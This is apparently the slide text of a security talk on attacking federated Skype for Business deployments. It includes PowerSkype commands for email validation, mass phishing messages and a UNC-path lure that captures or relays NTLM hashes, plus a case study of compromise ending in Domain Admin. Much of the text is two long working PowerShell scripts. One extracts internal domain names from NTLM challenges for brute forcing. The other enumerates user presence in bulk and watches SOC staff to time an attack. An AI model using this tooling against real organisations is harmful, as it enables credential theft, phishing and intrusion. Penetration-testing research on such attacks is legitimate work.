Many organizations are turning to Microsoft to help with their internal communication needs, and some are exposing themselves to external attacks by federating their Skype for Business (formerly Lync) deployments. Federation allows organizations to talk to other external Skype users, but do they really need to? In this talk, we'll go over how you can use the Lync SDK (and a federated account) to automate attacks against federated Skype for Business deployments. We will start with user enumeration and social engineering recon, move on to some password brute force attacks, and wrap things up by automating Skype phishing attacks.
2. Introductions
Who am I?
Karl Fosaaen
What do I do?
Wear lots of hats
Pen Testing
Password Cracking
Social Engineering
Blog
DEF CON Swag Goon
Pinball Repair
3. Overview
Introduction to Skype for Business
Email Validation and Social Engineering Recon
Password Brute Force Attacks
Skype Message Phishing
Attack Mitigations
Questions
5. Introduction to Skype for Business
It's Skype, but for businesses
IM/Video/Phone
File/Screen Sharing
Integrates with Outlook
Previously:
Office Communicator
Lync
6. Skype for Business
Skype Federation
Allows cross-domain communications
Pretty common
Can be limited by domain
Trusted Domains
Blocked List
7. Skype for Business
Identifying Federated Domains
Use a federated account of your own
Try to send a message to a user in the target domain; it only gets through if that domain federates with yours
9. Setting Up Your Test Environment
Basic Overview
Buy/Have a domain
Set up/Purchase Skype for Business Services
Install Skype for Business Client
Install Lync 2013 SDK
Get the PowerSkype PowerShell Module
10. Setting Up Your Test Environment
Get hosted Office365 services
Or set up your own server (not recommended)
11. Setting Up Your Test Environment
Set up your user and enable federation
12. Setting Up Your Test Environment
Install Skype for Business and the Lync SDK
Extract the install package and manually run the installer to bypass the Visual Studio version warning
https://www.microsoft.com/en-us/download/details.aspx?id=36824
13. Setting Up Your Test Environment
Login to Skype for Business as your user
14. Setting Up Your Test Environment
Grab the PowerShell module from NetSPI's GitHub
https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1
16. Email Validation and SE Recon
What do we need?
Potentially valid email addresses
How do we get them?
One of the many recon frameworks
LinkedIn
Google
20. Email Validation and SE Recon - Demo
Demo
Get-SkypeStatus -inputFile "C:\Temp\LiveAdmins.txt" | ft -AutoSize
-inputFile = guessed administrator accounts at Alexa top domains
It helps if we run it a couple of times; the first pass often comes back with unknown presence
23. Password Brute Force Attacks
Pros:
Internet facing
Single factor (usually)
No MFA support in Lync 2013 or on-premises Skype for Business
MFA is off by default in Office 365
Domain login: a hit is a usable domain credential
Federation is not required to do this
Cons:
Not easy with the Lync SDK
Nyxgeek has some great methods that I've started to add to PowerSkype
Edge cases are fun
24. Password Brute Force Attacks
Go watch @nyxgeek's DerbyCon talk
https://www.youtube.com/watch?v=v0NTaCFk6VI
Check out LyncSniper
https://github.com/mdsecresearch/LyncSniper
25. Password Brute Force Attacks
Attacking with PowerSkype
Uses the default Skype/Lync HTTP-NTLM authentication prompts
Prerequisites:
A standardized deployment with easy-to-identify authentication endpoints
A known domain name: example.com may use CORP as its internal (NetBIOS) domain
The internal domain can also be pulled from the HTTP-NTLM auth endpoint's challenge (nmap's http-ntlm-info script does this)
https://nmap.org/nsedoc/scripts/http-ntlm-info.html
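The NTLM trick above, as an added example that is not part of the talk, PowerSkype or nmap: the server's Type 2 challenge carries AV_PAIRs with the NetBIOS and DNS names of the domain and the front end, which is exactly the "CORP for example.com" mapping the brute force needs. The parser below reads those pairs; the sample challenge is constructed inline (not captured from a real server) so the parser runs offline, and the live helper assumes Windows PowerShell 5.1 and an NTLM-protected URL of your choosing on the Skype web services host (the hostname and path in the comment are assumptions).

```powershell
# Added example (not from the talk or PowerSkype): read the internal domain names out of an
# HTTP-NTLM challenge, the same trick nmap's http-ntlm-info uses. Assumes Windows PowerShell 5.1.

function ConvertFrom-NtlmType2 {
    # Parse an NTLM CHALLENGE (Type 2) message and return the AV_PAIR target info (MS-NLMP 2.2.1.2).
    param([Parameter(Mandatory)][byte[]]$Bytes)
    if ([System.Text.Encoding]::ASCII.GetString($Bytes, 0, 8) -ne "NTLMSSP`0") { throw 'Not an NTLMSSP message' }
    if ([BitConverter]::ToUInt32($Bytes, 8) -ne 2) { throw 'Not a Type 2 (CHALLENGE) message' }
    $flags    = [BitConverter]::ToUInt32($Bytes, 20)
    $tiLen    = [BitConverter]::ToUInt16($Bytes, 40)          # TargetInfoFields: Len, MaxLen, Offset
    $tiOffset = [BitConverter]::ToUInt32($Bytes, 44)
    $avNames  = @{ 1 = 'NetBIOSComputerName'; 2 = 'NetBIOSDomainName'; 3 = 'DnsComputerName'
                   4 = 'DnsDomainName'; 5 = 'DnsTreeName' }
    $info = [ordered]@{ NegotiateFlags = ('0x{0:X8}' -f $flags) }
    $pos = [int]$tiOffset; $end = $pos + $tiLen
    while ($pos + 4 -le $end) {
        $avId  = [int][BitConverter]::ToUInt16($Bytes, $pos)   # cast so it matches the Int32 hashtable keys
        $avLen = [int][BitConverter]::ToUInt16($Bytes, $pos + 2)
        $pos  += 4
        if ($avId -eq 0) { break }                              # MsvAvEOL ends the list
        if ($avNames.ContainsKey($avId)) {                      # string values are UTF-16LE
            $info[$avNames[$avId]] = [System.Text.Encoding]::Unicode.GetString($Bytes, $pos, $avLen)
        } elseif ($avId -eq 7) {                                # MsvAvTimestamp is a FILETIME
            $info['Timestamp'] = [DateTime]::FromFileTimeUtc([BitConverter]::ToInt64($Bytes, $pos))
        }
        $pos += $avLen
    }
    [pscustomobject]$info
}

function New-SampleNtlmType2 {
    # Constructed Type 2 message (not captured from a real server) so the parser can run offline.
    $u  = [System.Text.Encoding]::Unicode
    $ts = [DateTime]::new(2016, 6, 1, 0, 0, 0, [DateTimeKind]::Utc).ToFileTimeUtc()
    $av = [System.Collections.Generic.List[byte]]::new()
    foreach ($p in @(@{ Id = 2; V = $u.GetBytes('CORP') }, @{ Id = 1; V = $u.GetBytes('LYNC1') },
                     @{ Id = 4; V = $u.GetBytes('corp.example.com') },
                     @{ Id = 3; V = $u.GetBytes('lync1.corp.example.com') },
                     @{ Id = 7; V = [BitConverter]::GetBytes($ts) })) {
        $av.AddRange([byte[]][BitConverter]::GetBytes([uint16]$p.Id))
        $av.AddRange([byte[]][BitConverter]::GetBytes([uint16]$p.V.Length))
        $av.AddRange([byte[]]$p.V)
    }
    $av.AddRange([byte[]](0, 0, 0, 0))                                   # MsvAvEOL
    $name = $u.GetBytes('CORP')                                          # TargetName: the NetBIOS domain
    $m = [System.Collections.Generic.List[byte]]::new()
    $m.AddRange([System.Text.Encoding]::ASCII.GetBytes("NTLMSSP`0"))
    $m.AddRange([byte[]][BitConverter]::GetBytes([uint32]2))             # MessageType = CHALLENGE
    $m.AddRange([byte[]][BitConverter]::GetBytes([uint16]$name.Length)); $m.AddRange([byte[]][BitConverter]::GetBytes([uint16]$name.Length))
    $m.AddRange([byte[]][BitConverter]::GetBytes([uint32]56))            # TargetName sits right after the 56-byte header
    $m.AddRange([byte[]](0x15, 0x82, 0x89, 0xE2))                        # NegotiateFlags 0xE2898215 (UNICODE, TARGET_INFO, VERSION, ...)
    $m.AddRange([byte[]](1, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF))   # ServerChallenge
    $m.AddRange([byte[]]::new(8))                                        # Reserved
    $m.AddRange([byte[]][BitConverter]::GetBytes([uint16]$av.Count)); $m.AddRange([byte[]][BitConverter]::GetBytes([uint16]$av.Count))
    $m.AddRange([byte[]][BitConverter]::GetBytes([uint32](56 + $name.Length)))
    $m.AddRange([byte[]](6, 1, 0xB1, 0x1D, 0, 0, 0, 0x0F))               # Version 6.1.7601
    $m.AddRange([byte[]]$name); $m.AddRange($av)
    ,$m.ToArray()
}

function Get-NtlmChallengeInfo {
    # Send a generic NTLM NEGOTIATE (Type 1) and parse the challenge out of the 401 that comes back.
    param([Parameter(Mandatory)][string]$Url)
    $type1 = 'TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=='   # fixed Type 1 used by many tools
    try {
        Invoke-WebRequest -Uri $Url -Headers @{ Authorization = "NTLM $type1" } -UseBasicParsing -ErrorAction Stop | Out-Null
        throw "$Url answered without a 401; it does not seem to use NTLM"
    } catch [System.Net.WebException] {
        $resp = $_.Exception.Response
        if (-not $resp) { throw }                                        # connection-level failure: rethrow as-is
        $hdr = @($resp.Headers.GetValues('WWW-Authenticate')) | Where-Object { $_ -like 'NTLM *' } | Select-Object -First 1
        if (-not $hdr) { throw "No NTLM challenge in the 401 from $Url" }
        ConvertFrom-NtlmType2 -Bytes ([Convert]::FromBase64String($hdr.Substring(5)))
    }
}

ConvertFrom-NtlmType2 -Bytes (New-SampleNtlmType2) | Format-List
# Live use against the Skype web services host (hostname and path are assumptions):
# Get-NtlmChallengeInfo -Url 'https://lyncweb.example.com/WebTicket/WebTicketService.svc'
```

On the constructed sample the parser returns the NetBIOS domain and host (CORP, LYNC1), the DNS domain and host (corp.example.com, lync1.corp.example.com) and the server timestamp; against a real front end the NetBIOSDomainName field is the value to feed the brute force as the DOMAIN in DOMAIN\user.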
27. Skype Message Phishing Case Study
Sent a fake update message
User ran the "update" payload
Access to the user's desktop via the payload
Local administrator rights
Cached Domain Admin credentials on the box
Cracked the mscachev2 (DCC2) hash
Domain Admin access to the domain controllers
28. Skype Message Phishing
Send-SkypeMessage -email test@example.com -message "What's your password?"
Get-SkypeStatus -inputFile 'C:\Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage
31. Skype Message Phishing
Other Options
Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "\\192.168.1.123\test"
SMB capture/relay running on the internal network
UNC paths work for internal targets; hrefs work for external ones
Send this message out to a group, then capture or relay the hashes
32. Further Work / Fun Scenarios
Grab a domain's worth of phone numbers
Get-SkypeContacts
Should work if you already have creds
33. Further Work / Fun Scenarios
Party Line
Invoke-SendGroupSkypeMessage
Or just start a group call (with acquired creds)
34. Further Work / Fun Scenarios
Keep tabs on Statuses
Watch the status of a group (SOC Admins)
Respond accordingly (Start your attack)
Out of Office is handy for onsite SE
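An added example, not PowerSkype's own code, that serves both the email validation demo (Get-SkypeStatus over a list, run more than once) and the status watching above: it goes straight to the Lync 2013 SDK, retries a lookup until presence arrives, and polls a chosen group for status changes. It assumes Windows PowerShell 5.1, a Skype for Business client signed in with your federated account, and the SDK assembly at its default install path; the list file name and the addresses are made up.

```powershell
# Added example (not PowerSkype's code): bulk presence lookup through the Lync 2013 SDK, with the
# "run it a couple of times" retry from the demo slide, plus a watch loop for a chosen group.
# Assumes Windows PowerShell 5.1, the Skype for Business client signed in with a federated
# account, and the SDK at its default path; file names and addresses below are made up.

Add-Type -Path 'C:\Program Files (x86)\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll'

function Get-PresenceRecord {
    # Resolve one SIP address and return what the signed-in client can learn about it.
    param([Parameter(Mandatory)][string]$Email, [int]$Retries = 3)
    $client  = [Microsoft.Lync.Model.LyncClient]::GetClient()
    $contact = $client.ContactManager.GetContactByUri("sip:$Email")
    $cit     = [Microsoft.Lync.Model.ContactInformationType]
    # GetContactInformation throws when a field is not (yet) available; treat that as unknown
    $get     = { param($kind) try { $contact.GetContactInformation($kind) } catch { $null } }
    $status  = $null
    for ($i = 0; $i -lt $Retries; $i++) {
        $status = [string](& $get $cit::Activity)
        # Presence is delivered asynchronously after the first lookup, so the first answer is often empty
        if ($status -and $status -notlike '*unknown*') { break }
        Start-Sleep -Milliseconds 750
    }
    [pscustomobject]@{
        Email       = $Email
        Title       = [string](& $get $cit::Title)
        Status      = $status
        OutOfOffice = [bool](& $get $cit::IsOutOfOffice)
        Seen        = Get-Date
    }
}

function Watch-Presence {
    # Poll a group (say, the SOC or admin accounts) and print only status changes; stop with Ctrl+C.
    param([Parameter(Mandatory)][string[]]$Emails, [int]$IntervalSeconds = 60)
    $last = @{}
    while ($true) {
        foreach ($e in $Emails) {
            $r   = Get-PresenceRecord -Email $e
            $key = '{0}|{1}' -f $r.Status, $r.OutOfOffice
            if ($last[$e] -ne $key) {
                $oof = if ($r.OutOfOffice) { ' (Out of Office)' } else { '' }
                '{0:HH:mm:ss} {1,-36} {2}{3}' -f $r.Seen, $e, $r.Status, $oof
                $last[$e] = $key
            }
        }
        Start-Sleep -Seconds $IntervalSeconds
    }
}

# One pass over a list, same columns as the Get-SkypeStatus demo (file name is constructed)
Get-Content 'C:\Temp\LiveAdmins.txt' | ForEach-Object { Get-PresenceRecord -Email $_ } |
    Format-Table Email, Title, Status, OutOfOffice -AutoSize
# Keep tabs on a small group and react when they go Away or Out of Office
Watch-Presence -Emails 'soc1@example.com', 'soc2@example.com' -IntervalSeconds 30
```

Addresses that never leave unknown presence after the retries are the ones to drop from the list (no such user, or a domain that does not federate with yours); the watch loop prints a line only when someone's status or Out of Office flag changes, which is the moment the slides suggest acting on.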